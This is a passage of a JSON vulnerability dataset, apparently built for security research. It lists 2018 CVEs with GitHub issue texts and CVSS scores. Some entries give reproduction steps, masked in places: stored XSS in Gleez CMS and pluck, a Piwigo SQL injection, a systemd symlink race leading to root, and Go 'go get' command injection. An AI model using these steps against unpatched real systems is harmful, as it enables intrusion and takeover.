p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG e0 in opj_j2k_encode (p_j2k NUMBERTAG de NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG e in opj_encode (p_info NUMBERTAG e NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG at PATHTAG NUMBERTAG f4b6 in main (argc NUMBERTAG arg NUMBERTAG fffffffdcf8) at PATHTAG",
  31833. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31834. "severity": "MEDIUM",
  31835. "baseScore": 5.5,
  31836. "impactScore": 3.6,
  31837. "exploitabilityScore": 1.8
  31838. },
  31839. {
  31840. "CVE_ID": "CVE-2018-6656",
  31841. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/175",
  31842. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/175",
  31843. "Repo_new": "zblogcn/zblogphp",
  31844. "Issue_Created_At": "2018-02-06T03:50:27Z",
  31845. "description": "Z APITAG CSRF \u5220\u9664users\u76ee\u5f55\u53ca\u6587\u4ef6\u9020\u6210\u7f51\u7ad9\u7f3a\u5c11\u6587\u4ef6\u65e0\u6cd5\u6b63\u5e38\u8bbf\u95ee. PATHTAG \u6f0f\u6d1e\u4ee3\u7801\u5904\uff1a if($blogversion NUMBERTAG app=$zbp APITAG $_GET['id']); if($app >type == $_GET['type']){ if($app APITAG $app APITAG } } }else{ function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != '.' && $object != '..') { if (filetype($dir . '/' . $object) == 'dir') { rrmdir($dir . '/' . $object); } else { unlink($dir . '/' . $object); } } } reset($objects); rmdir($dir); } } \u5982\u679c\u6ee1\u8db3\u5224\u65ad\u6761\u4ef6 APITAG \u5220\u9664\u65b9\u6cd5 \u5982\u679c\u4e0d\u6ee1\u8db3\u6267\u884celse\u4e0b\u9762\u5220\u9664\u65b9\u6cd5 APITAG PATHTAG NUMBERTAG public function APITAG { global $zbp; rrmdir($zbp >usersdir . $this >type . '/' . $this >id); $this APITAG } PATHTAG \u6d4b\u8bd5\u8fc7\u7a0b\uff1a APITAG \u6761\u4ef6\uff1a \u9700\u8981\u7ba1\u7406\u5458\u767b\u5f55",
  31846. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  31847. "severity": "MEDIUM",
  31848. "baseScore": 6.5,
  31849. "impactScore": 3.6,
  31850. "exploitabilityScore": 2.8
  31851. },
  31852. {
  31853. "CVE_ID": "CVE-2018-6767",
  31854. "Issue_Url_old": "https://github.com/dbry/WavPack/issues/27",
  31855. "Issue_Url_new": "https://github.com/dbry/wavpack/issues/27",
  31856. "Repo_new": "dbry/wavpack",
  31857. "Issue_Created_At": "2018-02-03T12:58:47Z",
  31858. "description": "stack buffer overflow while running wavpack. Forwarding a bug report we received in the Debian bug tracker ( CVETAG stack buffer overflow running wavpack with \" y APITAG option Running 'wavpack y APITAG with the attached file raises stack buffer overflow which may allow a remote attacker to cause unspecified impact including denial of service attack I expected the program to terminate without segfault, but the program crashes as follow ERRORTAG This bug was found with a fuzzer developed by APITAG group at KAIST poc.wav can be downloaded from CVETAG",
  31859. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31860. "severity": "HIGH",
  31861. "baseScore": 7.8,
  31862. "impactScore": 5.9,
  31863. "exploitabilityScore": 1.8
  31864. },
  31865. {
  31866. "CVE_ID": "CVE-2018-6846",
  31867. "Issue_Url_old": "https://github.com/zblogcn/zblogphp/issues/176",
  31868. "Issue_Url_new": "https://github.com/zblogcn/zblogphp/issues/176",
  31869. "Repo_new": "zblogcn/zblogphp",
  31870. "Issue_Created_At": "2018-02-08T09:14:41Z",
  31871. "description": "PATHTAG \u7206\u7269\u7406\u8def\u5f84. PATHTAG Code\uff1a class Upload extends Base { Rows NUMBERTAG Return error \uff1a Fatal error: Class APITAG not found in PATHTAG on line NUMBERTAG Harm\uff1a Web site physical path leakage .",
  31872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  31873. "severity": "MEDIUM",
  31874. "baseScore": 5.3,
  31875. "impactScore": 1.4,
  31876. "exploitabilityScore": 3.9
  31877. },
  31878. {
  31879. "CVE_ID": "CVE-2018-6869",
  31880. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/22",
  31881. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/22",
  31882. "Repo_new": "gdraheim/zziplib",
  31883. "Issue_Created_At": "2018-02-08T17:32:05Z",
  31884. "description": "Uncontrolled memory allocation in __zzip_parse_root_directory ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib, there is an uncontrolled memory allocation and a crash in __zzip_parse_root_directory function of PATHTAG which could be triggered by the POC below. The issue happens since in line NUMBERTAG of PATHTAG file, the request size of malloc (i.e., zz_rootsize) could be manipulated by an input file. Note that this function is in libzzip NUMBERTAG APITAG fd NUMBERTAG struct _disk_trailer trailer NUMBERTAG hdr0 = (struct zzip_dir_hdr ) malloc(zz_rootsize NUMBERTAG To reproduce the issue, run ./zzdir $POC POC: FILETAG back stack NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG b NUMBERTAG bytes of APITAG (errno NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG fff NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG c NUMBERTAG ff NUMBERTAG ba NUMBERTAG ff NUMBERTAG bb NUMBERTAG ff NUMBERTAG bc NUMBERTAG ff NUMBERTAG bd NUMBERTAG ff NUMBERTAG bdb NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG ff NUMBERTAG e NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG b NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG c NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG d NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG f NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG ff NUMBERTAG eb NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb NUMBERTAG ff NUMBERTAG eb2a NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb2a NUMBERTAG ff NUMBERTAG eb2b NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb2b NUMBERTAG ff NUMBERTAG eb NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eb NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG ed NUMBERTAG ff NUMBERTAG eeff NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG eeff NUMBERTAG ff NUMBERTAG f0ff NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f0ff NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG e NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG a NUMBERTAG ff NUMBERTAG f NUMBERTAG b NUMBERTAG ff NUMBERTAG f NUMBERTAG b NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG ff NUMBERTAG ab NUMBERTAG ff NUMBERTAG ab NUMBERTAG ff NUMBERTAG cc NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ff NUMBERTAG ff NUMBERTAG ff NUMBERTAG c NUMBERTAG ff NUMBERTAG c NUMBERTAG ff NUMBERTAG cc NUMBERTAG ff NUMBERTAG cc NUMBERTAG ff NUMBERTAG cd NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG cd NUMBERTAG ff NUMBERTAG ce NUMBERTAG PATHTAG NUMBERTAG ff NUMBERTAG ce NUMBERTAG ff NUMBERTAG cf NUMBERTAG ffcd NUMBERTAG ffcd NUMBERTAG a NUMBERTAG stack NUMBERTAG ffcd NUMBERTAG ff NUMBERTAG ffcd NUMBERTAG dso NUMBERTAG ffffffffff NUMBERTAG ffffffffff NUMBERTAG syscall] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG ff NUMBERTAG f5dba NUMBERTAG APITAG NUMBERTAG ff NUMBERTAG f5e NUMBERTAG e3 in APITAG const , int, char const , unsigned long long, unsigned long long) APITAG NUMBERTAG ff NUMBERTAG f5e8a NUMBERTAG APITAG NUMBERTAG ff NUMBERTAG f NUMBERTAG e0cc APITAG NUMBERTAG ff NUMBERTAG f5d NUMBERTAG e7 in malloc APITAG NUMBERTAG ff NUMBERTAG f NUMBERTAG fc3 in __zzip_parse_root_directory PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG b8c in __zzip_dir_parse PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG b8c in zzip_dir_fdopen_ext_io PATHTAG NUMBERTAG ff NUMBERTAG f NUMBERTAG f8b in zzip_opendir_ext_io PATHTAG NUMBERTAG f2e in main PATHTAG NUMBERTAG ff NUMBERTAG ed NUMBERTAG c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ec ( PATHTAG )",
  31885. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31886. "severity": "MEDIUM",
  31887. "baseScore": 6.5,
  31888. "impactScore": 3.6,
  31889. "exploitabilityScore": 2.8
  31890. },
  31891. {
  31892. "CVE_ID": "CVE-2018-6876",
  31893. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/973",
  31894. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/973",
  31895. "Repo_new": "imagemagick/imagemagick",
  31896. "Issue_Created_At": "2018-02-07T08:38:19Z",
  31897. "description": "stack buffer underflow. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib cairo djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw rsvg tiff webp wmf x xml zlib libfpx PATHTAG ASAN OUTPUT APITAG > PATHTAG convert FILETAG not_kitty.FPX APITAG NUMBERTAG ERROR: APITAG stack buffer underflow on address NUMBERTAG bfb NUMBERTAG at pc NUMBERTAG aff NUMBERTAG b8 bp NUMBERTAG bfb NUMBERTAG f8 sp NUMBERTAG bfb NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG bfb NUMBERTAG thread T NUMBERTAG aff NUMBERTAG b7 in APITAG const&) PATHTAG NUMBERTAG afdece4b in APITAG PATHTAG NUMBERTAG afdef6f9 in APITAG PATHTAG NUMBERTAG afdf NUMBERTAG in APITAG char const , APITAG unsigned int) PATHTAG NUMBERTAG afe NUMBERTAG in APITAG int, int, float, APITAG unsigned long, APITAG unsigned char, unsigned char) PATHTAG NUMBERTAG afe3df6c in APITAG unsigned int, unsigned int, unsigned int, unsigned int, APITAG APITAG APITAG APITAG ) PATHTAG NUMBERTAG afe3e NUMBERTAG in APITAG PATHTAG NUMBERTAG b3c6ba NUMBERTAG in APITAG APITAG NUMBERTAG b NUMBERTAG f in APITAG APITAG NUMBERTAG b NUMBERTAG c1f in APITAG APITAG NUMBERTAG b5b NUMBERTAG e4a in APITAG APITAG NUMBERTAG b5d NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG abe in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG fb ( PATHTAG ) POC FILETAG System Configuration APITAG APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: APITAG",
  31898. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31899. "severity": "MEDIUM",
  31900. "baseScore": 6.5,
  31901. "impactScore": 3.6,
  31902. "exploitabilityScore": 2.8
  31903. },
  31904. {
  31905. "CVE_ID": "CVE-2018-6883",
  31906. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/839",
  31907. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/839",
  31908. "Repo_new": "piwigo/piwigo",
  31909. "Issue_Created_At": "2018-02-11T09:25:23Z",
  31910. "description": "Piwigo NUMBERTAG SQL injection in administration panel. An SQL injection has been discovered in the administration panel of Piwigo NUMBERTAG The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query. This could result in full information disclosure. The SQL injection vulnerability was found in FILETAG and is done by injecting SQL code in the 'tags' POST variable. This variable is only sanitized by APITAG and is not encapsulated by quotes in the concatenated SQL string allowing the injection to work. Furthermore, the result set is part of the page output allowing information disclosure about other tables in the database. The POST variables 'edit_list' and 'merge_list' are also vulnerable to this attack, however, no exploit exist to disclose information through these variables. A separate vulnerability report was made for 'edit_list' ( CVETAG , issue NUMBERTAG The security risk of the vulnerabilities are estimated as low with a CVSS score of NUMBERTAG Exploitation of the web vulnerability requires the attacker to be authenticated as administrator. A APITAG can be provided. I'm tracking this under CVETAG",
  31911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  31912. "severity": "MEDIUM",
  31913. "baseScore": 4.9,
  31914. "impactScore": 3.6,
  31915. "exploitabilityScore": 1.2
  31916. },
  31917. {
  31918. "CVE_ID": "CVE-2018-6930",
  31919. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/967",
  31920. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/967",
  31921. "Repo_new": "imagemagick/imagemagick",
  31922. "Issue_Created_At": "2018-01-31T05:55:36Z",
  31923. "description": "Stack over read in APITAG due to type mismatch. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I found that magick reads a buffer over the buffer size at the following line. URLTAG The above line reads APITAG as much as APITAG that is APITAG because APITAG is declared as a double type, on the other hand, the size of APITAG is APITAG because it's a float array. URLTAG I can reproduce this crash only in NUMBERTAG bit machine, I'm not sure why. also, this requires APITAG support. Steps to Reproduce Compile APITAG with address sanitizer in NUMBERTAG bit mode, and use this FILETAG to run magick. this crash is triggered when it's zooming, so I added APITAG option. ERRORTAG System Configuration APITAG version NUMBERTAG bit Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: Found by Choongwoo Han and Kyeongseok Yang, Naver Security Team",
  31924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31925. "severity": "MEDIUM",
  31926. "baseScore": 6.5,
  31927. "impactScore": 3.6,
  31928. "exploitabilityScore": 2.8
  31929. },
  31930. {
  31931. "CVE_ID": "CVE-2018-6948",
  31932. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/193",
  31933. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/193",
  31934. "Repo_new": "cn-uofbasel/ccn-lite",
  31935. "Issue_Created_At": "2018-02-13T15:19:56Z",
  31936. "description": "ccnl_prefix_to_str_detailed can overrun when using NFN. The function ccnl_prefix_to_str_detailed can cause an bufferoverflow, when writing a prefix to the buffer buf. Maximal size of the prefix is CCNL_MAX_PREFIX_SIZE, the buffer has the size CCNL_MAX_PREFIX_SIZE. However, if when NFN is enabled, additional characters are written to the buffer (e.g. the \"NFN\" and the \"R2C\" tags). Therefore, sending a NFN R2C packet with a prefix with the size of CCNL_MAX_PREFIX_SIZE can cause a overflow of buf inside ccnl_prefix_to_str_detailed.",
  31937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31938. "severity": "CRITICAL",
  31939. "baseScore": 9.8,
  31940. "impactScore": 5.9,
  31941. "exploitabilityScore": 3.9
  31942. },
  31943. {
  31944. "CVE_ID": "CVE-2018-6953",
  31945. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/195",
  31946. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/195",
  31947. "Repo_new": "cn-uofbasel/ccn-lite",
  31948. "Issue_Created_At": "2018-02-13T17:02:29Z",
  31949. "description": "NDNTLV parser accepts Length field of the Name without any checks. The Parser of NDNTLV accepts Length field of the Name without any checks. Therefore, it is possible, that the value of the length flied of a component of a prefix and the actual size of the component differ. in APITAG : CODETAG This issue can lead to a out of bound memory access, when executing ccnl_ndntlv_dehead again. Additionally, on many places CCN lite assumes, that the length of the prefix is always correct. By not having the length matching the actual component length, buffer overflows or out of bound memory accesses can occur on many places, e.g.: APITAG : buffer overflow, APITAG copies to many bytes if p >complen[i]) > len(prefix >comp[i]), which can lead to a buffer overflow of p >bytes APITAG : out of bound memory access, APITAG APITAG : out of bound memory access, APITAG",
  31950. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31951. "severity": "CRITICAL",
  31952. "baseScore": 9.8,
  31953. "impactScore": 5.9,
  31954. "exploitabilityScore": 3.9
  31955. },
  31956. {
  31957. "CVE_ID": "CVE-2018-6954",
  31958. "Issue_Url_old": "https://github.com/systemd/systemd/issues/7986",
  31959. "Issue_Url_new": "https://github.com/systemd/systemd/issues/7986",
  31960. "Repo_new": "systemd/systemd",
  31961. "Issue_Created_At": "2018-01-24T14:09:49Z",
  31962. "description": "tmpfiles: symlinks are followed in non terminal path components. Sorry to keep harassing you with these. I think APITAG is following symlinks that don't appear as the last path component. In other words, if we are at the point where tmpfiles is about to APITAG , then I can replace the \"foo\" component with a symlink to APITAG , resulting in APITAG and a fairly easy root exploit for any Z type. Same disclaimer: I'm running tmpfiles from a git checkout, but not booting systemd. Now I have APITAG and APITAG . I'm using the same tmpfiles.d entry as before, CODETAG I start the service once, so that APITAG exists: APITAG Now, as the owner (mjo) of APITAG , I can do, in another terminal, APITAG The NUMBERTAG dummy files buy some time to swap in the symlink before the loop gets to passwd . Now, restart the service back in the first terminal... APITAG And while that is busy looping on the NUMBERTAG dummy files, swap out foo with a symlink in the second terminal: APITAG (I've used \"mv\" because \"rm\" is ironically slow at deleting my own dummy files.) The end result is that I wind up as the owner of APITAG , and the APITAG sysctl doesn't protect against this.",
  31963. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31964. "severity": "HIGH",
  31965. "baseScore": 7.8,
  31966. "impactScore": 5.9,
  31967. "exploitabilityScore": 1.8
  31968. },
  31969. {
  31970. "CVE_ID": "CVE-2018-7035",
  31971. "Issue_Url_old": "https://github.com/gleez/cms/issues/794",
  31972. "Issue_Url_new": "https://github.com/gleez/cms/issues/794",
  31973. "Repo_new": "gleez/cms",
  31974. "Issue_Created_At": "2018-02-16T06:48:23Z",
  31975. "description": "Stored XSS via blog. Description: Cross site scripting (XSS) vulnerability in Gleez CMS might allow remote attackers (users) to inject arbitrary web script or HTML via the source editor, which will result in Stored XSS when an Administrator tries to edit the post. Vulnerability Type: Stored XSS Attack Vectors NUMBERTAG Login as user on Gleez CMS NUMBERTAG Click on Blogs > Add Blog NUMBERTAG Change to HTML mode in content bo NUMBERTAG Add XSS Payload : APITAG src=\"x\" APITAG style NUMBERTAG Save the blog NUMBERTAG Login as Administrator NUMBERTAG Goto Blogs NUMBERTAG Open the malicious blog and click on edit NUMBERTAG SS! Attack Impact: This could be used to perform actions against the administrators (or any user editing that post) and could potentially lead to hijacking the user\u2019s session/token. This could happen by users navigating to the attacker\u2019s post on their own, or by the attacker somehow persuading the victim to navigate to the post. Note: It'll not result into XSS in the normal view mode, but when admin or other user will try to edit the post code will be APITAG XSS from User to Admin.]",
  31976. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31977. "severity": "MEDIUM",
  31978. "baseScore": 5.4,
  31979. "impactScore": 2.7,
  31980. "exploitabilityScore": 2.3
  31981. },
  31982. {
  31983. "CVE_ID": "CVE-2018-7039",
  31984. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/191",
  31985. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/191",
  31986. "Repo_new": "cn-uofbasel/ccn-lite",
  31987. "Issue_Created_At": "2018-02-13T10:15:53Z",
  31988. "description": "buffer overflow in APITAG Hi, I think that there are multiple issues with various APITAG functions. I've picked the APITAG as an example. The len parameter refers to the size of the blob and offset to the position where the data in blob should be written to buf . The function returns NUMBERTAG if the offset is lower than the size of the blob which is prepended to the buffer (basically if somebody tries to write before the buffer ( buffer underwrite CVETAG . ERRORTAG I've made a short illustration depicting valid input parameters and the result after the memcpy operation. FILETAG Do you agree? Anyway, why are length and offset int parameters? TIA Michael",
  31989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  31990. "severity": "CRITICAL",
  31991. "baseScore": 9.8,
  31992. "impactScore": 5.9,
  31993. "exploitabilityScore": 3.9
  31994. },
  31995. {
  31996. "CVE_ID": "CVE-2018-7187",
  31997. "Issue_Url_old": "https://github.com/golang/go/issues/23867",
  31998. "Issue_Url_new": "https://github.com/golang/go/issues/23867",
  31999. "Repo_new": "golang/go",
  32000. "Issue_Created_At": "2018-02-16T01:43:54Z",
  32001. "description": "cmd/go: arbitrary command execution via VCS path. I contacted EMAILTAG rg about this and was allowed to create a public issue. What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? Yes. What did you do? I've noticed that go get is vulnerable to arbitrary command execution via VCS path command injection due to lack of repository URL validation. This command should execute APITAG on the target system: go get insecure APITAG vuln See URLTAG APITAG The proof of concept presented above is targeting Mercurial. What did you expect to see? ERRORTAG What did you see instead? APITAG",
  32002. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32003. "severity": "HIGH",
  32004. "baseScore": 8.8,
  32005. "impactScore": 5.9,
  32006. "exploitabilityScore": 2.8
  32007. },
  32008. {
  32009. "CVE_ID": "CVE-2018-7197",
  32010. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/47",
  32011. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/47",
  32012. "Repo_new": "pluck-cms/pluck",
  32013. "Issue_Created_At": "2018-02-17T18:52:49Z",
  32014. "description": "Stored XSS due to Unsantized Url embedding. Hello In addition to the command injection that was mentioned in one of the preceding issues, it's also vulnerable to stored XSS. Reproduction is quite easy NUMBERTAG First install cms, login with administrator to create a blog, create a page and insert blog to it, then logout as admin NUMBERTAG Then we go our blog post and file out the reaction information. We fill in PATHTAG with generic information. For our url we'll provide this string, URLTAG \"> APITAG FILETAG NUMBERTAG Once we submit we'll get met with an alert echo'ing our website's domain name/",
  32015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32016. "severity": "MEDIUM",
  32017. "baseScore": 6.1,
  32018. "impactScore": 2.7,
  32019. "exploitabilityScore": 2.8
  32020. },
  32021. {
  32022. "CVE_ID": "CVE-2018-7225",
  32023. "Issue_Url_old": "https://github.com/LibVNC/libvncserver/issues/218",
  32024. "Issue_Url_new": "https://github.com/libvnc/libvncserver/issues/218",
  32025. "Repo_new": "libvnc/libvncserver",
  32026. "Issue_Created_At": "2018-02-18T17:30:45Z",
  32027. "description": "Security: libvncserver/rfbserver.c: APITAG case APITAG doesn't sanitize APITAG While I consider this a security relevant issue, I feel there's no overall benefit from reporting it under an embargo, so here goes. libvncserver/rfbserver.c: APITAG contains the following code: ERRORTAG This passes the client provided NUMBERTAG bit message length field's value directly into APITAG , reads up to this many bytes from the client, and then passes the full value to the library user provided APITAG callback (where the value might be higher than the number of bytes actually read with uninitialized and potentially sensitive data afterwards and it might also be too high for the callback's implementation to handle safely). There may also be integer overflow in the addition of APITAG (which is NUMBERTAG to the value in the call to APITAG ; I did not look into what consequences this might have. I first found the issue during Openwall's security audit of the Virtuozzo NUMBERTAG product, which uses a RHEL7 derived package of APITAG NUMBERTAG from its prl vzvncserver component. A corresponding Virtuozzo NUMBERTAG fix is: URLTAG which hardens prl vzvncserver's APITAG callback but the rest of the issue needs to be fixed in libvncserver itself, hence the (belated) report in here. We would like to thank the Virtuozzo company for funding the effort. Included below is the relevant excerpt from our Virtuozzo NUMBERTAG report: cut NUMBERTAG PSBM NUMBERTAG prl vzvncserver and APITAG integer overflows, unlimited memory allocations, and unchecked APITAG Severity: medium Thread NUMBERTAG prl vzvncserver\" A particular combination of these NUMBERTAG problems is demonstrated by sending the output of APITAG to prl vzvncserver's TCP port, when prl vzvncserver is running without password. APITAG running with password, authentication would be needed before the specific vulnerable code can be reached, and the string to send would accordingly be longer.) This first causes APITAG to allocate NUMBERTAG APITAG of address space and then to hand out this uninitialized memory to the prl vzvncserver/console.c: APITAG callback, which would attempt to make another similar allocation and make a copy of the data. Unfortunately, this APITAG API, as well as many others, is defined to use \"int\" rather than \"size_t\" for data sizes, and indeed prl vzvncserver uses \"int\" too. For this particular request, this results in a zero byte allocation with APITAG which succeeds, and then in a APITAG of (size_t NUMBERTAG bytes to it. With a range of other similar requests, APITAG may instead be made to fail (for trying to allocate a ridiculous amount of address space, sign extended to NUMBERTAG bit), in which case the APITAG more reliably fails on a NULL pointer dereference. Either way, the service crashes. Finally, it is possible to have the process actually write to (and thus allocate for real) almost NUMBERTAG APITAG of memory with one request, by making the length field just below NUMBERTAG APITAG If no data is sent, then NUMBERTAG APITAG would be written from the uninitialized memory (likely mostly read as zero) to the memory allocated by prl vzvncserver's callback. If the data is actually sent, then first it is written to memory by APITAG and then is copied by the callback, for NUMBERTAG APITAG total. Exploitability of this specific issue into something worse than these varying possibilities is highly doubtful (although exploitation of unlimited size APITAG is not unheard of), but all NUMBERTAG of these issues are prevalent in prl vzvncserver and APITAG code in general, so maybe the impact of another similar issue would more obviously be worse. We recommend that sanity checks be introduced into APITAG so that it doesn't try to allocate unreasonable amounts of memory and pass unsafe sizes to callbacks. We also recommend prl vzvncserver to sanity check its inputs (including received from APITAG and in this way avoid integer overflows and unreasonably large allocations. Finally, it is good practice to check whether a APITAG succeeded before writing to the memory. The function APITAG 